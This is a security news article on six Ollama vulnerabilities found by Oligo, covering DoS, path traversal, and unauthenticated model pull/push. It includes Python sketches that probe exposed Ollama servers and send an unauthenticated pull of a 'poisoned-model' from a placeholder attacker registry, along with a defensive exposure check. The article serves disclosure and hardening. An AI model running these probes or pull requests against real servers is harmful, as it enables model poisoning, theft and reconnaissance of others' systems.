Six Vulnerabilities Uncovered in Ollama: Risks of AI Model Theft and Poisoning

[Image: 10K unique internet-facing IPs that run Ollama | Source: Oligo]

Oligo’s research team recently unveiled six vulnerabilities in Ollama, a popular open-source framework for running large language models (LLMs) on local and cloud infrastructure. As Ollama’s use in enterprise AI environments has surged, these vulnerabilities highlight significant risks for organizations deploying the tool.

Of the six vulnerabilities identified, four were officially assigned CVEs and patched in recent updates, while two were disputed by Ollama’s maintainers and classified by Oligo as “shadow vulnerabilities.” As the report notes, “Collectively, the vulnerabilities could allow an attacker to carry out a wide-range of malicious actions with a single HTTP request, including Denial of Service (DoS) attacks, model poisoning, model theft, and more.”

  • CVE-2024-39719 (File Existence Disclosure): Gives attackers a primitive for determining whether a given file exists on the server, making it easier for threat actors to further abuse the application.
  • CVE-2024-39720 (Out-of-Bounds Read): This vulnerability can cause a Denial of Service by crashing the application when handling malformed model files. The flaw “enables attackers to crash the application through the CreateModel route, leading to a segmentation fault” due to improper memory handling.
  • CVE-2024-39721 (Infinite Loop in CreateModel Route): A crafted API call could push the server into an infinite loop, exhausting CPU resources. According to Oligo, “calling the api/create endpoint multiple times with these parameters increases CPU usage… leading to denial of service.”
  • CVE-2024-39722 (Path Traversal): Through path traversal, attackers can gain insight into a server’s file structure, potentially exposing sensitive directories. The api/push route, used for model management, was flagged for reflecting file path errors that could disclose server directory contents (see the probe sketch below).
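
The “single HTTP request” framing is easy to picture. The minimal sketch below (Python, standard library only) checks whether a host answers Ollama’s documented, unauthenticated GET /api/version and GET /api/tags endpoints; the target address is a placeholder, and this is an illustration of the exposure Oligo measured, not the researchers’ tooling.

```python
# Hedged sketch: does this host answer unauthenticated Ollama API requests
# on the default port (11434)? GET /api/version and GET /api/tags are
# documented Ollama endpoints; the host below is a TEST-NET placeholder.
import json
import urllib.request

HOST = "192.0.2.10"  # placeholder address, not a real target
BASE = f"http://{HOST}:11434"

def get(path: str) -> dict:
    """Issue a single unauthenticated GET and decode the JSON body."""
    with urllib.request.urlopen(f"{BASE}{path}", timeout=5) as resp:
        return json.load(resp)

try:
    version = get("/api/version")  # e.g. {"version": "0.3.14"}
    models = get("/api/tags")      # lists every model stored on the server
    print(f"Exposed Ollama {version.get('version')} with "
          f"{len(models.get('models', []))} models reachable without auth")
except OSError:
    print("No unauthenticated Ollama instance reachable on this host")
```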

Ollama’s model management endpoints—api/pull and api/push—pose serious security risks, as they lack sufficient authentication controls. This allows attackers to “pull a model from an unverified (HTTP) source” or “push a model to an unverified source,” making it possible to introduce malicious models into a server or exfiltrate private models without detection.
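
To show what the missing authentication means in practice, here is a hedged sketch of an unauthenticated pull. POST /api/pull and its insecure flag (which permits plain-HTTP registries) are documented Ollama API options; the registry path is a hypothetical placeholder, and the snippet assumes a local test instance rather than reproducing Oligo’s proof of concept.

```python
# Hedged sketch: an unauthenticated model-management request. The server
# accepts this POST with no credentials; "insecure": True is a documented
# option that allows pulling from an unverified (HTTP) registry.
import json
import urllib.request

OLLAMA = "http://127.0.0.1:11434"  # assumes a local test instance

payload = json.dumps({
    "model": "registry.example.com/attacker/poisoned-model",  # placeholder
    "insecure": True,   # permit an unverified plain-HTTP source
    "stream": False,
}).encode()

req = urllib.request.Request(
    f"{OLLAMA}/api/pull",
    data=payload,
    headers={"Content-Type": "application/json"},
    method="POST",
)
with urllib.request.urlopen(req, timeout=30) as resp:
    print(json.load(resp))  # {"status": "success"} if the pull completes
```

The same pattern applies to api/push in reverse: without authentication in front of the API, whoever can reach the port can move models onto or off of the server.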

The report emphasizes that these issues “widen the attack surface” for organizations using Ollama, as attackers can exploit the model endpoints to corrupt models or steal proprietary intellectual property. By default, these endpoints remain open to external access, which could “lead to a denial of service (DoS)” when models are continuously downloaded, filling disk space.

With over 94,000 GitHub stars, Ollama’s popularity underscores the urgency for users to apply patches, configure security settings, and understand the implications of exposing AI model endpoints to the internet.
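
As a starting point for that configuration work, the hedged sketch below checks whether a local instance’s API port answers on a non-loopback address. Binding the server to loopback via the documented OLLAMA_HOST environment variable (e.g. OLLAMA_HOST=127.0.0.1:11434), or fronting it with an authenticating reverse proxy, keeps the model-management routes off the open internet; the address-discovery line is best-effort and may need adjusting per host.

```python
# Hedged sketch: verify an Ollama instance is not reachable on a
# non-loopback interface. A True result on the LAN address means the
# unauthenticated API is network-reachable and should be firewalled
# or placed behind an authenticating proxy.
import socket

def port_open(host: str, port: int = 11434) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=3):
            return True
    except OSError:
        return False

lan_ip = socket.gethostbyname(socket.gethostname())  # best-effort local address
print("loopback listener:", port_open("127.0.0.1"))
print(f"exposed on {lan_ip}:", port_open(lan_ip))
```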
